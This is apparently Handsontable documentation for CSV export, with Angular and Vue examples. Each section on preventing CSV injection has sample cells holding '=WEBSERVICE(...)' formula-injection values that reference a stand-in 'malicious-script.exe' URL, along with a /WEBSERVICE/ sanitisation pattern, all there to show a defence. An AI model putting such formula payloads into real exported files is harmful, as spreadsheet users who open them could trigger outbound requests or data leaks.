['A7', 'B7', 'C7', 'D7', 'E7', 'F7', 'G7'],
];
readonly hotSettings: GridSettings = {
colHeaders: true,
rowHeaders: true,
hiddenRows: { rows: [1, 3, 5], indicators: true },
hiddenColumns: { columns: [1, 3, 5], indicators: true },
height: 'auto',
autoWrapRow: true,
autoWrapCol: true,
};
exportBlob() {
const exportPlugin = this.hotTable.hotInstance!.getPlugin('exportFile');
const exportedBlob = exportPlugin.exportAsBlob('csv', {
bom: false,
columnDelimiter: ',',
colHeaders: false,
exportHiddenColumns: true,
exportHiddenRows: true,
mimeType: 'text/csv',
rowDelimiter: '\r\n',
rowHeaders: true,
});
console.log(exportedBlob);
}
}
/* end-file */
/* file: app.config.ts */
import { ApplicationConfig, provideZoneChangeDetection } from '@angular/core';
import { registerAllModules } from 'handsontable/registry';
import { HOT_GLOBAL_CONFIG, HotGlobalConfig, NON_COMMERCIAL_LICENSE } from '@handsontable/angular-wrapper';
// register Handsontable's modules
registerAllModules();
export const appConfig: ApplicationConfig = {
providers: [
provideZoneChangeDetection({ eventCoalescing: true }),
{
provide: HOT_GLOBAL_CONFIG,
useValue: { license: NON_COMMERCIAL_LICENSE } as HotGlobalConfig,
},
],
};
/* end-file */
HTML
<div>
<app-example2></app-example2>
</div>

Export as a string

Open a console in browser developer tools to see the result for the below example.

TypeScript
/* file: app.component.ts */
import { Component, ViewChild } from '@angular/core';
import { GridSettings, HotTableComponent, HotTableModule} from '@handsontable/angular-wrapper';
@Component({
standalone: true,
imports: [HotTableModule],
selector: 'app-example3',
template: `
<div class="example-controls-container">
<div class="controls">
<button (click)="exportString()">Export as a string</button>
</div>
</div>
<hot-table
[settings]="hotSettings!" [data]="hotData">
</hot-table>
`,
})
export class AppComponent {
@ViewChild(HotTableComponent, {static: false}) hotTable!: HotTableComponent;
readonly hotData = [
['A1', 'B1', 'C1', 'D1', 'E1', 'F1', 'G1'],
['A2', 'B2', 'C2', 'D2', 'E2', 'F2', 'G2'],
['A3', 'B3', 'C3', 'D3', 'E3', 'F3', 'G3'],
['A4', 'B4', 'C4', 'D4', 'E4', 'F4', 'G4'],
['A5', 'B5', 'C5', 'D5', 'E5', 'F5', 'G5'],
['A6', 'B6', 'C6', 'D6', 'E6', 'F6', 'G6'],
['A7', 'B7', 'C7', 'D7', 'E7', 'F7', 'G7'],
];
readonly hotSettings: GridSettings = {
colHeaders: true,
rowHeaders: true,
hiddenRows: { rows: [1, 3, 5], indicators: true },
hiddenColumns: { columns: [1, 3, 5], indicators: true },
height: 'auto',
autoWrapRow: true,
autoWrapCol: true,
};
exportString() {
const exportPlugin = this.hotTable.hotInstance!.getPlugin('exportFile');
const exportedString = exportPlugin.exportAsString('csv', {
bom: false,
columnDelimiter: ',',
colHeaders: false,
exportHiddenColumns: true,
exportHiddenRows: true,
rowDelimiter: '\r\n',
rowHeaders: true,
});
console.log(exportedString);
}
}
/* end-file */
/* file: app.config.ts */
import { ApplicationConfig, provideZoneChangeDetection } from '@angular/core';
import { registerAllModules } from 'handsontable/registry';
import { HOT_GLOBAL_CONFIG, HotGlobalConfig, NON_COMMERCIAL_LICENSE } from '@handsontable/angular-wrapper';
// register Handsontable's modules
registerAllModules();
export const appConfig: ApplicationConfig = {
providers: [
provideZoneChangeDetection({ eventCoalescing: true }),
{
provide: HOT_GLOBAL_CONFIG,
useValue: { license: NON_COMMERCIAL_LICENSE } as HotGlobalConfig,
},
],
};
/* end-file */
HTML
<div>
<app-example3></app-example3>
</div>

Prevent CSV Injection attack

“CSV Injection, also known as Formula Injection, occurs when websites embed untrusted input inside CSV files. When a spreadsheet program such as Microsoft Excel or LibreOffice Calc is used to open a CSV, any cells starting with = will be interpreted by the software as a formula.” (from OWASP website)

To prevent this attack, set the sanitizeValues option when exporting your data in CSV format.

TypeScript
/* file: app.component.ts */
import { Component, ViewChild, ViewEncapsulation } from '@angular/core';
import { GridSettings, HotTableComponent, HotTableModule } from '@handsontable/angular-wrapper';
@Component({
selector: 'app-example4',
standalone: true,
imports: [HotTableModule],
template: `
<div class="example-controls-container">
<div class="controls">
<button (click)="downloadCSVWithNoSanitization()">Download CSV with no sanitization</button>
<button (click)="downloadCSVWithRecommendedSanitization()">Download CSV with recommended sanitization</button>
<button (click)="downloadCSVWithRegexpSanitization()">Download CSV with sanitization using a regexp</button>
<button (click)="downloadCSVWithFunctionSanitization()">Download CSV with sanitization using a function</button>
</div>
</div>
<hot-table
[settings]="hotSettings!" [data]="hotData">
</hot-table>
`,
encapsulation: ViewEncapsulation.None
})
export class AppComponent {
@ViewChild(HotTableComponent, {static: false}) hotTable!: HotTableComponent;
readonly hotData = [
['https://handsontable.com', '=WEBSERVICE(A1)'],
['https://github.com', '=WEBSERVICE(A2)'],
['http://example.com/malicious-script.exe', '=WEBSERVICE(A3)'],
];
readonly hotSettings: GridSettings = {
colHeaders: true,
rowHeaders: true,
height: 'auto',
autoWrapRow: true,
autoWrapCol: true,
};
downloadCSVWithNoSanitization() {
const exportPlugin = this.hotTable.hotInstance!.getPlugin('exportFile');
exportPlugin.downloadFile('csv', {
bom: false,
columnDelimiter: ',',
colHeaders: false,
exportHiddenColumns: true,
exportHiddenRows: true,
fileExtension: 'csv',
filename: 'Handsontable-CSV-file_[YYYY]-[MM]-[DD]',
mimeType: 'text/csv',
rowDelimiter: '\r\n',
});
}
downloadCSVWithRecommendedSanitization() {
const exportPlugin = this.hotTable.hotInstance!.getPlugin('exportFile');
exportPlugin.downloadFile('csv', {
bom: false,
columnDelimiter: ',',
colHeaders: false,
exportHiddenColumns: true,
exportHiddenRows: true,
fileExtension: 'csv',
filename: 'Handsontable-CSV-file_[YYYY]-[MM]-[DD]',
mimeType: 'text/csv',
rowDelimiter: '\r\n',
sanitizeValues: true,
});
}
downloadCSVWithRegexpSanitization() {
const exportPlugin = this.hotTable.hotInstance!.getPlugin('exportFile');
exportPlugin.downloadFile('csv', {
bom: false,
columnDelimiter: ',',
colHeaders: false,
exportHiddenColumns: true,
exportHiddenRows: true,
fileExtension: 'csv',
filename: 'Handsontable-CSV-file_[YYYY]-[MM]-[DD]',
mimeType: 'text/csv',
rowDelimiter: '\r\n',
sanitizeValues: /WEBSERVICE/,
});
}
downloadCSVWithFunctionSanitization() {
const exportPlugin = this.hotTable.hotInstance!.getPlugin('exportFile');
exportPlugin.downloadFile('csv', {
bom: false,
columnDelimiter: ',',
colHeaders: false,
exportHiddenColumns: true,
exportHiddenRows: true,
fileExtension: 'csv',
filename: 'Handsontable-CSV-file_[YYYY]-[MM]-[DD]',
mimeType: 'text/csv',
rowDelimiter: '\r\n',
sanitizeValues: (value: string) => {
return /WEBSERVICE/.test(value) ? 'REMOVED SUSPICIOUS CELL CONTENT' : value;
},
});
}
}
/* end-file */
/* file: app.config.ts */
import { ApplicationConfig, provideZoneChangeDetection } from '@angular/core';
import { registerAllModules } from 'handsontable/registry';
import { HOT_GLOBAL_CONFIG, HotGlobalConfig, NON_COMMERCIAL_LICENSE } from '@handsontable/angular-wrapper';
registerAllModules();
export const appConfig: ApplicationConfig = {
providers: [
provideZoneChangeDetection({ eventCoalescing: true }),
{
provide: HOT_GLOBAL_CONFIG,
useValue: {
license: NON_COMMERCIAL_LICENSE,
} as HotGlobalConfig,
},
],
};
/* end-file */
HTML
<div>
<app-example4></app-example4>
</div>

Available methods

The plugin exposes the following methods to export data.

Each method takes two parameters. The first, format, is required. The second, options, is an optional object that overrides or extends the default export configuration. The table below lists all supported options for CSV export.

Available options in the export configuration

PropertyType / DefaultDescription
bomBoolean, default truePrepend output with BOM (UTF-8). Browser uses EF BB BF.
colHeadersBoolean, default falseInclude column headers. Does not support the NestedHeaders plugin.
columnDelimiterString, default ','Column delimiter.
exportHiddenColumnsBoolean, default falseInclude hidden columns.
exportHiddenRowsBoolean, default falseInclude hidden rows.
fileExtensionString, default 'csv'File extension. Used by downloadFile().
filenameString, default 'Handsontable [YYYY]-[MM]-[DD]'File name. Placeholders [YYYY], [MM], [DD] are replaced with the current date. Used by downloadFile().
mimeTypeString, default 'text/csv'MIME type. Used by downloadFile() and exportAsBlob().
rangeArray, default []Cell range to export: [startRow, startColumn, endRow, endColumn] (visual indexes).
rowDelimiterString, default '\r\n'Row delimiter.
rowHeadersBoolean, default falseInclude row headers.
sanitizeValuesBoolean | RegExp | Function, default falseValue sanitization. true = OWASP CSV injection rules; RegExp = escape matching values; Function = replace with return value.

Plugins

Skip to content

Export to CSV

Export your grid’s raw data to the CSV format, as a downloadable file, a blob, or a string. Customize your export using Handsontable’s configuration options.

Examples

Mind that CSV exports contain only raw data, and don’t include formulas, styling, or formatting information.

Export to file

Vue
<script setup lang="ts">
import { ref, useTemplateRef } from 'vue';
import { HotTable } from '@handsontable/vue3';
import { registerAllModules } from 'handsontable/registry';
import type { GridSettings } from 'handsontable/settings';
registerAllModules();
const hotRef = useTemplateRef<InstanceType<typeof HotTable>>('hotRef');
const gridData = [
['A1', 'B1', 'C1', 'D1', 'E1', 'F1', 'G1'],
['A2', 'B2', 'C2', 'D2', 'E2', 'F2', 'G2'],
['A3', 'B3', 'C3', 'D3', 'E3', 'F3', 'G3'],
['A4', 'B4', 'C4', 'D4', 'E4', 'F4', 'G4'],
['A5', 'B5', 'C5', 'D5', 'E5', 'F5', 'G5'],
['A6', 'B6', 'C6', 'D6', 'E6', 'F6', 'G6'],
['A7', 'B7', 'C7', 'D7', 'E7', 'F7', 'G7'],
];
const hotSettings = ref<GridSettings>({
data: gridData,
colHeaders: true,
rowHeaders: true,
hiddenRows: { rows: [1, 3, 5], indicators: true },
hiddenColumns: { columns: [1, 3, 5], indicators: true },
height: 'auto',
autoWrapRow: true,
autoWrapCol: true,
licenseKey: 'non-commercial-and-evaluation',
});
function downloadCsv(): void {
const exportPlugin = hotRef.value?.hotInstance?.getPlugin('exportFile');
exportPlugin?.downloadFile('csv', {
bom: false,
columnDelimiter: ',',
colHeaders: false,
exportHiddenColumns: true,
exportHiddenRows: true,
fileExtension: 'csv',
filename: 'Handsontable-CSV-file_[YYYY]-[MM]-[DD]',
mimeType: 'text/csv',
rowDelimiter: '\r\n',
rowHeaders: true,
});
}
</script>
<template>
<div id="example1">
<div class="example-controls-container">
<div class="controls">
<button id="export-file" type="button" @click="downloadCsv">
Download CSV
</button>
</div>
</div>
<HotTable ref="hotRef" :settings="hotSettings" />
</div>
</template>

Export as a JavaScript Blob object

Open a console in browser developer tools to see the result for the below example.

Vue
<script setup lang="ts">
import { ref, useTemplateRef } from 'vue';
import { HotTable } from '@handsontable/vue3';
import { registerAllModules } from 'handsontable/registry';
import type { GridSettings } from 'handsontable/settings';
registerAllModules();
const hotRef = useTemplateRef<InstanceType<typeof HotTable>>('hotRef');
const gridData = [
['A1', 'B1', 'C1', 'D1', 'E1', 'F1', 'G1'],
['A2', 'B2', 'C2', 'D2', 'E2', 'F2', 'G2'],
['A3', 'B3', 'C3', 'D3', 'E3', 'F3', 'G3'],
['A4', 'B4', 'C4', 'D4', 'E4', 'F4', 'G4'],
['A5', 'B5', 'C5', 'D5', 'E5', 'F5', 'G5'],
['A6', 'B6', 'C6', 'D6', 'E6', 'F6', 'G6'],
['A7', 'B7', 'C7', 'D7', 'E7', 'F7', 'G7'],
];
const hotSettings = ref<GridSettings>({
data: gridData,
colHeaders: true,
rowHeaders: true,
hiddenRows: { rows: [1, 3, 5], indicators: true },
hiddenColumns: { columns: [1, 3, 5], indicators: true },
height: 'auto',
autoWrapRow: true,
autoWrapCol: true,
licenseKey: 'non-commercial-and-evaluation',
});
function exportBlob(): void {
const exportPlugin = hotRef.value?.hotInstance?.getPlugin('exportFile');
const exportedBlob = exportPlugin?.exportAsBlob('csv', {
bom: false,
columnDelimiter: ',',
colHeaders: false,
exportHiddenColumns: true,
exportHiddenRows: true,
mimeType: 'text/csv',
rowDelimiter: '\r\n',
rowHeaders: true,
});
console.log(exportedBlob);
}
</script>
<template>
<div id="example2">
<div class="example-controls-container">
<div class="controls">
<button id="export-blob" type="button" @click="exportBlob">
Export as a Blob
</button>
</div>
</div>
<HotTable ref="hotRef" :settings="hotSettings" />
</div>
</template>

Export as a string

Open a console in browser developer tools to see the result for the below example.

Vue
<script setup lang="ts">
import { ref, useTemplateRef } from 'vue';
import { HotTable } from '@handsontable/vue3';
import { registerAllModules } from 'handsontable/registry';
import type { GridSettings } from 'handsontable/settings';
registerAllModules();
const hotRef = useTemplateRef<InstanceType<typeof HotTable>>('hotRef');
const gridData = [
['A1', 'B1', 'C1', 'D1', 'E1', 'F1', 'G1'],
['A2', 'B2', 'C2', 'D2', 'E2', 'F2', 'G2'],
['A3', 'B3', 'C3', 'D3', 'E3', 'F3', 'G3'],
['A4', 'B4', 'C4', 'D4', 'E4', 'F4', 'G4'],
['A5', 'B5', 'C5', 'D5', 'E5', 'F5', 'G5'],
['A6', 'B6', 'C6', 'D6', 'E6', 'F6', 'G6'],
['A7', 'B7', 'C7', 'D7', 'E7', 'F7', 'G7'],
];
const hotSettings = ref<GridSettings>({
data: gridData,
colHeaders: true,
rowHeaders: true,
hiddenRows: { rows: [1, 3, 5], indicators: true },
hiddenColumns: { columns: [1, 3, 5], indicators: true },
height: 'auto',
autoWrapRow: true,
autoWrapCol: true,
licenseKey: 'non-commercial-and-evaluation',
});
function exportString(): void {
const exportPlugin = hotRef.value?.hotInstance?.getPlugin('exportFile');
const exportedString = exportPlugin?.exportAsString('csv', {
bom: false,
columnDelimiter: ',',
colHeaders: false,
exportHiddenColumns: true,
exportHiddenRows: true,
rowDelimiter: '\r\n',
rowHeaders: true,
});
console.log(exportedString);
}
</script>
<template>
<div id="example3">
<div class="example-controls-container">
<div class="controls">
<button id="export-string" type="button" @click="exportString">
Export as a string
</button>
</div>
</div>
<HotTable ref="hotRef" :settings="hotSettings" />
</div>
</template>

Prevent CSV Injection attack

“CSV Injection, also known as Formula Injection, occurs when websites embed untrusted input inside CSV files. When a spreadsheet program such as Microsoft Excel or LibreOffice Calc is used to open a CSV, any cells starting with = will be interpreted by the software as a formula.” (from OWASP website)

To prevent this attack, set the sanitizeValues option when exporting your data in CSV format.

Vue
<script setup lang="ts">
import { ref, useTemplateRef } from 'vue';
import { HotTable } from '@handsontable/vue3';
import { registerAllModules } from 'handsontable/registry';
import type { GridSettings } from 'handsontable/settings';
registerAllModules();
const hotRef = useTemplateRef<InstanceType<typeof HotTable>>('hotRef');
const hotSettings = ref<GridSettings>({
data: [
['https://handsontable.com', '=WEBSERVICE(A1)'],
['https://github.com', '=WEBSERVICE(A2)'],
['http://example.com/malicious-script.exe', '=WEBSERVICE(A3)'],
],
colHeaders: true,
rowHeaders: true,
height: 'auto',
autoWrapRow: true,
autoWrapCol: true,
licenseKey: 'non-commercial-and-evaluation',
});
const csvExportOptions = {
bom: false,
columnDelimiter: ',',
colHeaders: false,
exportHiddenColumns: true,
exportHiddenRows: true,
fileExtension: 'csv',
filename: 'Handsontable-CSV-file_[YYYY]-[MM]-[DD]',
mimeType: 'text/csv',
rowDelimiter: '\r\n',
} as const;
function downloadWithNoSanitization(): void {
hotRef.value?.hotInstance?.getPlugin('exportFile')?.downloadFile('csv', { ...csvExportOptions });
}
function downloadWithRecommendedSanitization(): void {
hotRef.value?.hotInstance?.getPlugin('exportFile')?.downloadFile('csv', {
...csvExportOptions,
sanitizeValues: true,
});
}
function downloadWithRegexpSanitization(): void {
hotRef.value?.hotInstance?.getPlugin('exportFile')?.downloadFile('csv', {
...csvExportOptions,
sanitizeValues: /WEBSERVICE/,
});
}
function downloadWithFunctionSanitization(): void {
hotRef.value?.hotInstance?.getPlugin('exportFile')?.downloadFile('csv', {
...csvExportOptions,
sanitizeValues: (value: string) => {
return /WEBSERVICE/.test(value) ? 'REMOVED SUSPICIOUS CELL CONTENT' : value;
},
});
}
</script>
<template>
<div id="example4">
<div class="example-controls-container">
<div class="controls">
<button type="button" @click="downloadWithNoSanitization">
Download CSV with no sanitization
</button>
<button type="button" @click="downloadWithRecommendedSanitization">
Download CSV with recommended sanitization
</button>
<button type="button" @click="downloadWithRegexpSanitization">
Download CSV with sanitization using a regexp
</button>
<button type="button" @click="downloadWithFunctionSanitization">
Download CSV with sanitization using a function
</button>
</div>
</div>
<HotTable ref="hotRef" :settings="hotSettings" />
</div>
</template>

Available methods

The plugin exposes the following methods to export data.

Each method takes two parameters. The first, format, is required. The second, options, is an optional object that overrides or extends the default export configuration. The table below lists all supported options for CSV export.

Available options in the export configuration

PropertyType / DefaultDescription
bomBoolean, default truePrepend output with BOM (UTF-8). Browser uses EF BB BF.
colHeadersBoolean, default falseInclude column headers. Does not support the NestedHeaders plugin.
columnDelimiterString, default ','Column delimiter.
exportHiddenColumnsBoolean, default falseInclude hidden columns.
exportHiddenRowsBoolean, default falseInclude hidden rows.
fileExtensionString, default 'csv'File extension. Used by downloadFile().
filenameString, default 'Handsontable [YYYY]-[MM]-[DD]'File name. Placeholders [YYYY], [MM], [DD] are replaced with the current date. Used by downloadFile().
mimeTypeString, default 'text/csv'MIME type. Used by downloadFile() and exportAsBlob().
rangeArray, default []Cell range to export: [startRow, startColumn, endRow, endColumn] (visual indexes).
rowDelimiterString, default '\r\n'Row delimiter.
rowHeadersBoolean, default falseInclude row headers.
sanitizeValuesBoolean | RegExp | Function, default falseValue sanitization. true = OWASP CSV injection rules; RegExp = escape matching values; Function = replace with return value.

Plugins